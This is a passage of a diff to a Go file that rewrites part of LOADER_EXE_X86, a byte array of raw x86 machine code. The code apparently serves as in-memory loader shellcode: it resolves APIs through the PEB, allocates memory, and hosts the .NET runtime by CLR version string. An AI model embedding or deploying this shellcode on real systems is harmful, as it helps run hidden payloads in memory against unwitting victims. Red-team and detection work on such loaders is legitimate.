0x24, 0x24, 0xbf, 0x00, 0x03, 0x60, 0x04, 0x55, 0x50, 0xe8, 0x75, 0x27,
0x00, 0x00, 0x83, 0xc4, 0x0c, 0xc7, 0x44, 0x24, 0x38, 0x3c, 0x00, 0x00,
0x00, 0x8d, 0x84, 0x24, 0xf8, 0x01, 0x00, 0x00, 0xb9, 0x04, 0x01, 0x00,
0x00, 0x89, 0x44, 0x24, 0x48, 0x8d, 0x84, 0x24, 0xf4, 0x00, 0x00, 0x00,
@ -191,9 +191,9 @@ var LOADER_EXE_X86 = []byte{
0x89, 0x44, 0x24, 0x18, 0x83, 0x7c, 0x24, 0x10, 0x00, 0x74, 0x4e, 0x6a,
0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x74, 0x24, 0x18, 0x6a, 0x00,
0xff, 0x56, 0x3c, 0x89, 0x86, 0x60, 0x0d, 0x00, 0x00, 0x85, 0xc0, 0x74,
0x13, 0xff, 0x74, 0x24, 0x10, 0x53, 0x50, 0xe8, 0x17, 0x24, 0x00, 0x00,
0x13, 0xff, 0x74, 0x24, 0x10, 0x53, 0x50, 0xe8, 0x6b, 0x24, 0x00, 0x00,
0x33, 0xed, 0x83, 0xc4, 0x0c, 0x45, 0xeb, 0x02, 0x33, 0xed, 0xff, 0x74,
0x24, 0x10, 0x6a, 0x00, 0x53, 0xe8, 0x25, 0x24, 0x00, 0x00, 0x8b, 0x44,
0x24, 0x10, 0x6a, 0x00, 0x53, 0xe8, 0x79, 0x24, 0x00, 0x00, 0x8b, 0x44,
0x24, 0x24, 0x83, 0xc4, 0x0c, 0x53, 0x6a, 0x01, 0xff, 0x10, 0x50, 0xff,
0x96, 0x88, 0x00, 0x00, 0x00, 0x57, 0xff, 0x96, 0xd0, 0x00, 0x00, 0x00,
0xff, 0x74, 0x24, 0x30, 0xff, 0x96, 0xd0, 0x00, 0x00, 0x00, 0xff, 0x74,
@ -201,8 +201,8 @@ var LOADER_EXE_X86 = []byte{
0x83, 0xbe, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x45, 0xff, 0xb6, 0x58,
0x0d, 0x00, 0x00, 0x8b, 0xbe, 0x60, 0x0d, 0x00, 0x00, 0x8d, 0x86, 0x48,
0x0d, 0x00, 0x00, 0x57, 0x50, 0x8d, 0x86, 0x38, 0x0d, 0x00, 0x00, 0x50,
0xe8, 0x9e, 0x20, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x2c, 0x0c,
0x00, 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0x62, 0x1f, 0x00, 0x00, 0x83,
0xe8, 0xf2, 0x20, 0x00, 0x00, 0xff, 0x76, 0x2c, 0x8d, 0x86, 0x2c, 0x0c,
0x00, 0x00, 0xff, 0x76, 0x28, 0x50, 0xe8, 0xb6, 0x1f, 0x00, 0x00, 0x83,
0xc4, 0x1c, 0x3b, 0x87, 0x18, 0x05, 0x00, 0x00, 0x75, 0x0c, 0x3b, 0x97,
0x1c, 0x05, 0x00, 0x00, 0x75, 0x04, 0x8b, 0xc5, 0xeb, 0x02, 0x33, 0xc0,
0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0xec, 0x02, 0x00, 0x00, 0xc3, 0x81,
@ -219,11 +219,11 @@ var LOADER_EXE_X86 = []byte{
0x8b, 0xb4, 0x24, 0xf4, 0x01, 0x00, 0x00, 0x8b, 0x54, 0x24, 0x10, 0xff,
0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8d, 0x84, 0x24, 0xec, 0x00, 0x00,
0x00, 0xc6, 0x84, 0x14, 0xec, 0x00, 0x00, 0x00, 0x00, 0xff, 0xb4, 0x24,
0x04, 0x02, 0x00, 0x00, 0x50, 0xe8, 0x97, 0x1e, 0x00, 0x00, 0x89, 0x44,
0x04, 0x02, 0x00, 0x00, 0x50, 0xe8, 0xeb, 0x1e, 0x00, 0x00, 0x89, 0x44,
0x24, 0x24, 0x83, 0xc4, 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x83, 0xc0, 0xfc,
0x89, 0x54, 0x24, 0x1c, 0x8d, 0x04, 0x98, 0x89, 0x44, 0x24, 0x10, 0xff,
0xb4, 0x24, 0x04, 0x02, 0x00, 0x00, 0x8b, 0x08, 0xff, 0xb4, 0x24, 0x04,
0x02, 0x00, 0x00, 0x03, 0xce, 0x51, 0xe8, 0x66, 0x1e, 0x00, 0x00, 0x33,
0x02, 0x00, 0x00, 0x03, 0xce, 0x51, 0xe8, 0xba, 0x1e, 0x00, 0x00, 0x33,
0x44, 0x24, 0x24, 0x83, 0xc4, 0x0c, 0x33, 0x54, 0x24, 0x1c, 0x3b, 0x84,
0x24, 0xf8, 0x01, 0x00, 0x00, 0x75, 0x09, 0x3b, 0x94, 0x24, 0xfc, 0x01,
0x00, 0x00, 0x74, 0x1d, 0x8b, 0x44, 0x24, 0x10, 0x83, 0xe8, 0x04, 0x89,
@ -245,9 +245,9 @@ var LOADER_EXE_X86 = []byte{
0x56, 0x57, 0x8b, 0x40, 0x30, 0x8b, 0x7d, 0x08, 0x8b, 0x40, 0x0c, 0x8b,
0x70, 0x0c, 0x39, 0x4e, 0x18, 0x74, 0x2a, 0x8b, 0x5d, 0x0c, 0x85, 0xc9,
0x75, 0x3f, 0x39, 0x5e, 0x18, 0x74, 0x12, 0x51, 0xff, 0x75, 0x14, 0xff,
0x76, 0x18, 0x57, 0xe8, 0xc3, 0x1b, 0x00, 0x00, 0x83, 0xc4, 0x10, 0x8b,
0x76, 0x18, 0x57, 0xe8, 0x17, 0x1c, 0x00, 0x00, 0x83, 0xc4, 0x10, 0x8b,
0xc8, 0x8b, 0x36, 0x83, 0x7e, 0x18, 0x00, 0x75, 0xdd, 0x85, 0xc9, 0x75,
0x1c, 0xff, 0x75, 0x10, 0x57, 0xe8, 0x0b, 0x1b, 0x00, 0x00, 0x59, 0x59,
0x1c, 0xff, 0x75, 0x10, 0x57, 0xe8, 0x5f, 0x1b, 0x00, 0x00, 0x59, 0x59,
0x85, 0xc0, 0x74, 0x0b, 0xff, 0x75, 0x14, 0x50, 0xff, 0x57, 0x34, 0x8b,
0xc8, 0xeb, 0x02, 0x33, 0xc9, 0x5f, 0x5e, 0x8b, 0xc1, 0x5b, 0x5d, 0xc3,
0x56, 0x8b, 0x74, 0x24, 0x0c, 0x57, 0x33, 0xff, 0x8b, 0x4e, 0x18, 0x85,
@ -278,57 +278,57 @@ var LOADER_EXE_X86 = []byte{
0x45, 0x08, 0xff, 0x75, 0x24, 0xff, 0x75, 0x20, 0x8b, 0x48, 0x08, 0xff,
0x75, 0x1c, 0xff, 0x75, 0x18, 0x8b, 0x11, 0xff, 0x75, 0x0c, 0x50, 0x51,
0xff, 0x52, 0x2c, 0x5d, 0xc2, 0x24, 0x00, 0x55, 0x8b, 0xec, 0x81, 0xec,
0x04, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0xe8, 0x8b, 0x19, 0x00, 0x00,
0x8b, 0x75, 0x0c, 0xb9, 0x7a, 0x1f, 0x40, 0x00, 0xbf, 0x7b, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0x71, 0x19,
0x04, 0x02, 0x00, 0x00, 0x53, 0x56, 0x57, 0xe8, 0xdf, 0x19, 0x00, 0x00,
0x8b, 0x75, 0x0c, 0xb9, 0x7a, 0x1f, 0x40, 0x00, 0xbf, 0xcf, 0x36, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x01, 0xe8, 0xc5, 0x19,
0x00, 0x00, 0xb9, 0x32, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0x5e, 0x19, 0x00, 0x00, 0xb9, 0x03, 0x20,
0x0e, 0x89, 0x41, 0x04, 0xe8, 0xb2, 0x19, 0x00, 0x00, 0xb9, 0x03, 0x20,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x08, 0xe8,
0x4b, 0x19, 0x00, 0x00, 0xb9, 0x9f, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0x38, 0x19, 0x00, 0x00, 0xb9,
0x9f, 0x19, 0x00, 0x00, 0xb9, 0x9f, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x0c, 0xe8, 0x8c, 0x19, 0x00, 0x00, 0xb9,
0x75, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x10, 0xe8, 0x25, 0x19, 0x00, 0x00, 0xb9, 0x51, 0x1c, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0x12, 0x19, 0x00,
0x10, 0xe8, 0x79, 0x19, 0x00, 0x00, 0xb9, 0x51, 0x1c, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x14, 0xe8, 0x66, 0x19, 0x00,
0x00, 0xb9, 0xb9, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e,
0x89, 0x41, 0x18, 0xe8, 0xff, 0x18, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0xec,
0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0xd9, 0x18, 0x00, 0x00, 0xb9, 0x2e,
0x89, 0x41, 0x18, 0xe8, 0x53, 0x19, 0x00, 0x00, 0xb9, 0x1c, 0x12, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x1c, 0xe8, 0x40,
0x19, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x20, 0xe8, 0x2d, 0x19, 0x00, 0x00, 0xb9, 0x2e,
0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x24,
0xe8, 0xc6, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x28, 0xe8, 0xb3, 0x18, 0x00, 0x00,
0xe8, 0x1a, 0x19, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x28, 0xe8, 0x07, 0x19, 0x00, 0x00,
0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89,
0x41, 0x2c, 0xe8, 0xa0, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x30, 0xe8, 0x8d, 0x18,
0x41, 0x2c, 0xe8, 0xf4, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x30, 0xe8, 0xe1, 0x18,
0x00, 0x00, 0xb9, 0xeb, 0x1f, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x34, 0xe8, 0x7a, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11,
0x0e, 0x89, 0x41, 0x34, 0xe8, 0xce, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x38, 0xe8,
0x67, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x3c, 0xe8, 0x54, 0x18, 0x00, 0x00, 0xb9,
0xbb, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x3c, 0xe8, 0xa8, 0x18, 0x00, 0x00, 0xb9,
0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x40, 0xe8, 0x41, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x44, 0xe8, 0x2e, 0x18, 0x00,
0x40, 0xe8, 0x95, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x44, 0xe8, 0x82, 0x18, 0x00,
0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e,
0x89, 0x41, 0x48, 0xe8, 0x1b, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x4c, 0xe8, 0x08,
0x89, 0x41, 0x48, 0xe8, 0x6f, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40,
0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x4c, 0xe8, 0x5c,
0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1,
0x8b, 0x0e, 0x89, 0x41, 0x50, 0xe8, 0xf5, 0x17, 0x00, 0x00, 0xb9, 0x49,
0x8b, 0x0e, 0x89, 0x41, 0x50, 0xe8, 0x49, 0x18, 0x00, 0x00, 0xb9, 0x49,
0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x54,
0xe8, 0xe2, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x58, 0xe8, 0xcf, 0x17, 0x00, 0x00,
0xe8, 0x36, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf,
0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x58, 0xe8, 0x23, 0x18, 0x00, 0x00,
0xb9, 0x6d, 0x1c, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89,
0x41, 0x5c, 0xe8, 0xbc, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x60, 0xe8, 0xa9, 0x17,
0x41, 0x5c, 0xe8, 0x10, 0x18, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00,
0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x60, 0xe8, 0xfd, 0x17,
0x00, 0x00, 0xb9, 0x13, 0x20, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b,
0x0e, 0x89, 0x41, 0x64, 0xe8, 0x96, 0x17, 0x00, 0x00, 0xb9, 0x41, 0x1c,
0x0e, 0x89, 0x41, 0x64, 0xe8, 0xea, 0x17, 0x00, 0x00, 0xb9, 0x41, 0x1c,
0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x68, 0xe8,
0x83, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x6c, 0xe8, 0x70, 0x17, 0x00, 0x00, 0xb9,
0xd7, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03,
0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x6c, 0xe8, 0xc4, 0x17, 0x00, 0x00, 0xb9,
0x2e, 0x11, 0x40, 0x00, 0x2b, 0xcf, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41,
0x70, 0xe8, 0x5d, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0x70, 0xe8, 0xb1, 0x17, 0x00, 0x00, 0xb9, 0x2e, 0x11, 0x40, 0x00, 0x2b,
0xcf, 0x8b, 0x7d, 0x08, 0x03, 0xc1, 0x8b, 0x0e, 0x89, 0x41, 0x74, 0x8d,
0x85, 0xfc, 0xfd, 0xff, 0xff, 0x83, 0x66, 0x10, 0x00, 0x50, 0x8d, 0x87,
0x19, 0x06, 0x00, 0x00, 0x89, 0x7e, 0x14, 0x50, 0x57, 0xe8, 0x16, 0x17,
0x19, 0x06, 0x00, 0x00, 0x89, 0x7e, 0x14, 0x50, 0x57, 0xe8, 0x6a, 0x17,
0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x5e, 0x04, 0x8d, 0x85, 0xfc, 0xfd,
0xff, 0xff, 0x53, 0x50, 0xff, 0x97, 0xb8, 0x00, 0x00, 0x00, 0x85, 0xc0,
0x75, 0x13, 0x8b, 0x0b, 0x8d, 0x46, 0x08, 0x50, 0x8d, 0x87, 0xc0, 0x08,
@ -354,7 +354,7 @@ var LOADER_EXE_X86 = []byte{
0x00, 0x00, 0x00, 0x7d, 0x0b, 0x88, 0x0c, 0x17, 0x40, 0x42, 0x8a, 0x0a,
0x84, 0xc9, 0x75, 0xe9, 0x85, 0xc0, 0x74, 0x1d, 0xff, 0x75, 0x0c, 0x46,
0xc6, 0x44, 0x05, 0x80, 0x00, 0x03, 0xf0, 0x8d, 0x45, 0x80, 0x50, 0xe8,
0xb4, 0x1c, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x75, 0xbc, 0x40, 0xeb,
0x08, 0x1d, 0x00, 0x00, 0x59, 0x59, 0x85, 0xc0, 0x75, 0xbc, 0x40, 0xeb,
0x02, 0x33, 0xc0, 0x5f, 0x5e, 0xc9, 0xc3, 0x55, 0x8b, 0xec, 0x83, 0xec,
0x1c, 0x83, 0x7d, 0x0c, 0x00, 0x74, 0x31, 0x6a, 0x1c, 0x8d, 0x45, 0xe4,
0x50, 0x8b, 0x45, 0x08, 0xff, 0x75, 0x0c, 0xff, 0x50, 0x44, 0x83, 0xf8,
@ -362,48 +362,55 @@ var LOADER_EXE_X86 = []byte{
0x81, 0x7d, 0xfc, 0x00, 0x00, 0x02, 0x00, 0x75, 0x0b, 0x83, 0x7d, 0xf8,
0x04, 0x75, 0x05, 0x33, 0xc0, 0x40, 0xc9, 0xc3, 0x33, 0xc0, 0xc9, 0xc3,
0x81, 0xec, 0x14, 0x02, 0x00, 0x00, 0x53, 0x8b, 0x9c, 0x24, 0x24, 0x02,
0x00, 0x00, 0x33, 0xc0, 0x21, 0x44, 0x24, 0x04, 0x55, 0x8b, 0xac, 0x24,
0x24, 0x02, 0x00, 0x00, 0x56, 0x57, 0x8b, 0xbc, 0x24, 0x28, 0x02, 0x00,
0x00, 0x8b, 0x8f, 0xe8, 0x00, 0x00, 0x00, 0x85, 0xc9, 0x0f, 0x84, 0x82,
0x00, 0x00, 0x00, 0x53, 0x8d, 0x87, 0x60, 0x08, 0x00, 0x00, 0x50, 0x8d,
0x87, 0x50, 0x08, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88,
0x9d, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x24, 0x50, 0x8d, 0x45, 0x0c,
0x50, 0x57, 0xe8, 0x3d, 0x15, 0x00, 0x00, 0x8b, 0x13, 0x8d, 0x73, 0x04,
0x83, 0xc4, 0x0c, 0x8d, 0x87, 0x70, 0x08, 0x00, 0x00, 0x8b, 0x0a, 0x56,
0x50, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x52, 0xff, 0x51, 0x0c, 0x85, 0xc0,
0x78, 0x34, 0x8b, 0x06, 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b, 0x08,
0xff, 0x51, 0x28, 0x85, 0xc0, 0x78, 0x33, 0x83, 0x7c, 0x24, 0x14, 0x00,
0x74, 0x1f, 0x8b, 0x0e, 0x8d, 0x43, 0x08, 0x50, 0x8d, 0x87, 0x90, 0x08,
0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x87, 0x80, 0x08, 0x00, 0x00, 0x50,
0x51, 0xff, 0x52, 0x24, 0xeb, 0x03, 0x83, 0x26, 0x00, 0x85, 0xc0, 0x78,
0x09, 0x83, 0xbf, 0xe8, 0x00, 0x00, 0x00, 0x00, 0x75, 0x1c, 0x8d, 0x43,
0x00, 0x00, 0x33, 0xc0, 0x55, 0x8b, 0xac, 0x24, 0x24, 0x02, 0x00, 0x00,
0x56, 0x57, 0x8b, 0xbc, 0x24, 0x28, 0x02, 0x00, 0x00, 0x33, 0xf6, 0x89,
0x74, 0x24, 0x18, 0x8b, 0x8f, 0xe8, 0x00, 0x00, 0x00, 0x85, 0xc9, 0x0f,
0x84, 0xd5, 0x00, 0x00, 0x00, 0x53, 0x8d, 0x87, 0x60, 0x08, 0x00, 0x00,
0x50, 0x8d, 0x87, 0x50, 0x08, 0x00, 0x00, 0x50, 0xff, 0xd1, 0x85, 0xc0,
0x0f, 0x88, 0xee, 0x00, 0x00, 0x00, 0x8d, 0x4c, 0x24, 0x24, 0xc6, 0x45,
0x0d, 0x34, 0x51, 0x8d, 0x45, 0x0c, 0xc6, 0x45, 0x11, 0x33, 0x50, 0x57,
0x66, 0xc7, 0x45, 0x13, 0x33, 0x31, 0xc6, 0x45, 0x15, 0x39, 0xe8, 0x7d,
0x15, 0x00, 0x00, 0x8b, 0x0b, 0x8d, 0x53, 0x04, 0x83, 0xc4, 0x0c, 0x8b,
0x01, 0x52, 0x8d, 0x97, 0x70, 0x08, 0x00, 0x00, 0x52, 0x8d, 0x54, 0x24,
0x2c, 0x52, 0x51, 0xff, 0x50, 0x0c, 0x85, 0xc0, 0x79, 0x40, 0x8d, 0x44,
0x24, 0x24, 0xc6, 0x45, 0x0d, 0x32, 0x50, 0x8d, 0x45, 0x0c, 0xc6, 0x45,
0x11, 0x35, 0x50, 0x57, 0x66, 0xc7, 0x45, 0x13, 0x37, 0x32, 0xc6, 0x45,
0x15, 0x37, 0xe8, 0x3d, 0x15, 0x00, 0x00, 0x8b, 0x03, 0x8d, 0x53, 0x04,
0x83, 0xc4, 0x0c, 0x8b, 0x08, 0x52, 0x8d, 0x97, 0x70, 0x08, 0x00, 0x00,
0x52, 0x8d, 0x54, 0x24, 0x2c, 0x52, 0x50, 0xff, 0x51, 0x0c, 0x85, 0xc0,
0x78, 0x35, 0x8b, 0x43, 0x04, 0x8d, 0x54, 0x24, 0x14, 0x52, 0x50, 0x8b,
0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x78, 0x32, 0x39, 0x74, 0x24, 0x14,
0x74, 0x20, 0x8b, 0x4b, 0x04, 0x8d, 0x43, 0x08, 0x50, 0x8d, 0x87, 0x90,
0x08, 0x00, 0x00, 0x50, 0x8b, 0x11, 0x8d, 0x87, 0x80, 0x08, 0x00, 0x00,
0x50, 0x51, 0xff, 0x52, 0x24, 0xeb, 0x03, 0x21, 0x73, 0x04, 0x85, 0xc0,
0x78, 0x08, 0x39, 0xb7, 0xe8, 0x00, 0x00, 0x00, 0x75, 0x1c, 0x8d, 0x43,
0x08, 0x50, 0x8d, 0x87, 0x90, 0x08, 0x00, 0x00, 0x50, 0x8d, 0x87, 0x80,
0x08, 0x00, 0x00, 0x50, 0x6a, 0x00, 0x6a, 0x00, 0xff, 0x97, 0xe4, 0x00,
0x00, 0x00, 0x85, 0xc0, 0x79, 0x10, 0x83, 0x63, 0x08, 0x00, 0x33, 0xc0,
0xe9, 0x1b, 0x01, 0x00, 0x00, 0x83, 0x23, 0x00, 0xeb, 0xd0, 0x8b, 0x43,
0x08, 0x50, 0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x0f, 0x88, 0x01,
0x01, 0x00, 0x00, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x80, 0x38, 0x00,
0x8d, 0x73, 0x0c, 0x75, 0x0c, 0x8b, 0x43, 0x08, 0x56, 0x50, 0x8b, 0x08,
0xff, 0x51, 0x34, 0xeb, 0x3e, 0x8d, 0x4c, 0x24, 0x24, 0x51, 0x50, 0x57,
0xe8, 0x73, 0x14, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24,
0x50, 0xff, 0x97, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x4b, 0x08, 0x8b, 0xf0,
0x8d, 0x43, 0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x11, 0x56, 0x51, 0xff, 0x52,
0x30, 0x56, 0x89, 0x44, 0x24, 0x1c, 0xff, 0x97, 0xb4, 0x00, 0x00, 0x00,
0x8b, 0x44, 0x24, 0x18, 0x8d, 0x73, 0x0c, 0x85, 0xc0, 0x0f, 0x88, 0xa1,
0x00, 0x00, 0x00, 0x8b, 0x16, 0x8d, 0x43, 0x10, 0x50, 0x8d, 0x87, 0xa0,
0x00, 0x00, 0x85, 0xc0, 0x79, 0x0e, 0x21, 0x73, 0x08, 0x33, 0xc0, 0xe9,
0x1c, 0x01, 0x00, 0x00, 0x21, 0x33, 0xeb, 0xd2, 0x8b, 0x43, 0x08, 0x50,
0x8b, 0x08, 0xff, 0x51, 0x28, 0x85, 0xc0, 0x0f, 0x88, 0x05, 0x01, 0x00,
0x00, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x80, 0x38, 0x00, 0x8d, 0x53,
0x0c, 0x75, 0x0c, 0x8b, 0x43, 0x08, 0x52, 0x50, 0x8b, 0x08, 0xff, 0x51,
0x34, 0xeb, 0x3f, 0x8d, 0x4c, 0x24, 0x24, 0x51, 0x50, 0x57, 0xe8, 0x75,
0x14, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x24, 0x50, 0xff,
0x97, 0xb0, 0x00, 0x00, 0x00, 0x8b, 0x4b, 0x08, 0x8b, 0xf0, 0x8d, 0x43,
0x0c, 0x50, 0x6a, 0x00, 0x8b, 0x11, 0x56, 0x51, 0xff, 0x52, 0x30, 0x56,
0x89, 0x44, 0x24, 0x14, 0xff, 0x97, 0xb4, 0x00, 0x00, 0x00, 0x8b, 0x74,
0x24, 0x18, 0x8b, 0x44, 0x24, 0x10, 0x85, 0xc0, 0x0f, 0x88, 0xa4, 0x00,
0x00, 0x00, 0x8b, 0x53, 0x0c, 0x8d, 0x43, 0x10, 0x50, 0x8d, 0x87, 0xa0,
0x08, 0x00, 0x00, 0x50, 0x8b, 0x0a, 0x52, 0xff, 0x11, 0x85, 0xc0, 0x0f,
0x88, 0x87, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x24, 0x05, 0x00, 0x00, 0x83,
0x88, 0x89, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x24, 0x05, 0x00, 0x00, 0x83,
0x64, 0x24, 0x20, 0x00, 0x89, 0x44, 0x24, 0x1c, 0x8d, 0x44, 0x24, 0x1c,
0x50, 0x6a, 0x01, 0x6a, 0x11, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x8b,
0xf0, 0x85, 0xf6, 0x74, 0x63, 0x8b, 0x56, 0x0c, 0x33, 0xc9, 0x39, 0x8d,
0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x8a, 0x84, 0x29, 0x28, 0x05, 0x00,
0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00, 0x00, 0x72,
0xed, 0x8b, 0x4b, 0x10, 0x8d, 0x43, 0x14, 0x50, 0x56, 0x51, 0x8b, 0x11,
0xff, 0x92, 0xb4, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x1b, 0xc0, 0x33, 0xd2,
0x40, 0x8b, 0xca, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x46, 0x0c, 0x39, 0x95,
0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x88, 0x94, 0x29, 0x28, 0x05, 0x00,
0x00, 0x88, 0x14, 0x08, 0x41, 0x3b, 0x8d, 0x24, 0x05, 0x00, 0x00, 0x72,
0xed, 0x56, 0xff, 0x97, 0xa4, 0x00, 0x00, 0x00, 0x8b, 0x44, 0x24, 0x10,
0x50, 0x6a, 0x01, 0x6a, 0x11, 0xff, 0x97, 0x98, 0x00, 0x00, 0x00, 0x89,
0x44, 0x24, 0x10, 0x85, 0xc0, 0x74, 0x63, 0x8b, 0x50, 0x0c, 0x33, 0xc9,
0x39, 0x8d, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13, 0x8a, 0x84, 0x29, 0x28,
